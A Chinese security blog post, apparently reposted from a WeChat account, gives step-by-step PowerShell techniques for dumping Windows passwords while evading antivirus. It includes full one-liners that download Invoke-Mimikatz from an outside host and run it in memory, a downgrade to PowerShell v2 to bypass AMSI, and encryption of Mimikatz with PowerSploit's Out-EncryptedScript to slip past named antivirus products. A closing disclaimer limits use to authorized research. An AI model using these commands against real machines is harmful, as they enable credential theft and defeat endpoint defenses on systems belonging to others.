【干货分享】powershell免杀抓密码姿势

admin 2021年8月3日01:47:33评论214 views字数 1796阅读5分59秒阅读模式

前言

今天给大家分享两个利用powershell来bypass杀软抓密码技巧,亲测目前不杀。
注:本号首发在了土司 https://www.t00ls.net/thread-62167-1-1.html

一.


利用powershell v2绕过amsi抓windows密码(前提是win10机器需要.net3.0以上)

当我们实用原始的powershell执行经典的抓密码发现,是被amsi阻止的

powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.52.134:6688/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"


【干货分享】powershell免杀抓密码姿势


此时我们利用降维攻击,强制使用PowerShell v2绕过 amsi,因为版本2没有支持AMSI的必要内部挂钩

【干货分享】powershell免杀抓密码姿势


可以看到成功绕过了amsi的检测执行成功mimikatz抓到了密码!

二.

使用Out-EncryptedScript加密免杀抓取密码(亲测目前可绕过某绒和某60)

Out-EncryptedScript是Powersploit中提供工具的一种,他是用来进行加密处理的脚本,首先我们将Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放到同一目录下

【干货分享】powershell免杀抓密码姿势


依次执行如下命令

powershell.exeImport-Module .Out-EncryptedScript.ps1Out-EncryptedScript -ScriptPath .Invoke-Mimikatz.ps1 -Password tubai -Salt 123456



【干货分享】powershell免杀抓密码姿势


目录下便会自动生成evil.ps1文件,上传到目标机器即可

【干货分享】powershell免杀抓密码姿势


在目标机器依次执行如下命令

powershell.exeIEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1")  注:由于https://raw.githubusercontent.com/不稳地,我本人是放在自己的阿里云上的。[String] $cmd = Get-Content .evil.ps1Invoke-Expression $cmd$decrypted = de tubai 123456Invoke-Expression $decryptedInvoke-Mimikatz



【干货分享】powershell免杀抓密码姿势

如下,便成功绕过了杀软,成功的抓到了密码

【干货分享】powershell免杀抓密码姿势



总结:

绕过AV的方式层出不穷,powershell在内网渗透方面利用的方式非常多,远远不止免杀与信息收集,希望大家能在授权的情况下,玩转自己的绕过思路,都能总结出自己的一些bypass小技巧!

声明:文章初衷仅为攻防研究学习交流之用,严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无关

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【干货分享】powershell免杀抓密码姿势

往期文章有彩蛋哦【干货分享】powershell免杀抓密码姿势

【干货分享】powershell免杀抓密码姿势

一如既往的学习,一如既往的整理,一如即往的分享。【干货分享】powershell免杀抓密码姿势

如侵权请私聊公众号删文

本文始发于微信公众号(渗透Xiao白帽):【干货分享】powershell免杀抓密码姿势

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月3日01:47:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【干货分享】powershell免杀抓密码姿势https://cn-sec.com/archives/445136.html

发表评论

匿名网友 填写信息